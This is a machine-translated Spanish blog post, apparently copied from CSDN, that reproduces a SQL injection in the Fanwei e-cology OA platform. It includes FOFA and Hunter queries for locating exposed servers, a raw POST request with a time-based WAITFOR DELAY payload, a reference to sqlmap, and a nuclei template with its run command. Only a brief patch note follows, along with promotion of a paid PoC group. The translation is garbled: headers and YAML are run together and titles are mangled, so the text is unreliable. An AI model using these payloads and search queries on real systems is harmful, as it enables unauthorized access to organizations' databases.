[Recurrencia de vulnerabilidad] Vulnerabilidad de inyección SQL de la recepción de Fanwei e-cology

0x01 Notas de lectura

Los artículos técnicos de Tianqing Attack and Defense Lab son solo de referencia. La información proporcionada en este artículo está destinada únicamente al personal de seguridad de la red para probar o mantener los sitios web, servidores, etc. (incluidos, entre otros) de los que son responsables. No lo utilice sin autorización. La información técnica del artículo se utiliza para inmiscuirse en cualquier sistema informático. Las consecuencias y perjuicios directos o indirectos causados ​​por el uso de la información proporcionada en este artículo serán asumidos por el propio usuario. Las herramientas proporcionadas en este artículo son únicamente para aprendizaje y otros usos están prohibidos. ! !

Descripción de la vulnerabilidad 0x02

(1) Ecología de Fanwei

Fanwei e-cology es una plataforma de gestión colaborativa desarrollada por Fanwei Network Technology, que admite la gestión multifuncional de recursos humanos, finanzas, administración y oficinas móviles. La vulnerabilidad se debe al hecho de que Fanwei e-cology no filtró de manera efectiva la entrada del usuario y la empalmó directamente en la declaración de consulta SQL, lo que resultó en una vulnerabilidad de inyección SQL en el sistema.

Sintaxis FOFA:

app.name=="泛微 e-cology 9.0 OA"

Sintaxis del cazador:

app.name="泛微 e-cology 9.0 OA"app.name="泛微 e-cology OA"


(2) Poc de vulnerabilidad

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveReferer: 127.0.0.1:9999/wui/index.htmlContent-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.9Content-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

Inyectar usando sqlmap

guión de exploración de núcleos

Fuente: https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

id: ecology-oa-filedownloadforoutdoc-sqliinfo:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqlirequests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {
   
   {Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close                fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'
./nuclei -u http://oa.xxx.com/ -t ./ultimaste-nuclei-templates/ecology-oa/ecology-oa-filedownloadforoutdoc-sqli.yaml

Más POC de vulnerabilidad publicado en Knowledge Planet

  

 Un tema reciente para el planeta y algunas demostraciones de las herramientas dentro del planeta.

Envío de miembros de Inner Planet

El último día de intercambio de vulnerabilidades de seguridad web. Intercambio de habilidades de minería de vulnerabilidades.

   Únase al planeta, busque el Laboratorio de Defensa y Ofensiva de Tianqing en la aplicación del planeta del conocimiento, más emocionante, así que estad atentos

plan de reparación 0x03

Mitigación de corrección oficial

enlace de parche

  • sugerencia de reparación

El funcionario ha publicado una sugerencia de reparación, recomendando que los usuarios afectados actualicen a la última versión del parche v10.58.0 lo antes posible.

Dirección de descarga: https://www.weaver.com.cn/cs/securityDownload.asp#

Supongo que te gusta

Origin blog.csdn.net/2301_79099363/article/details/131692158
Recomendado
Clasificación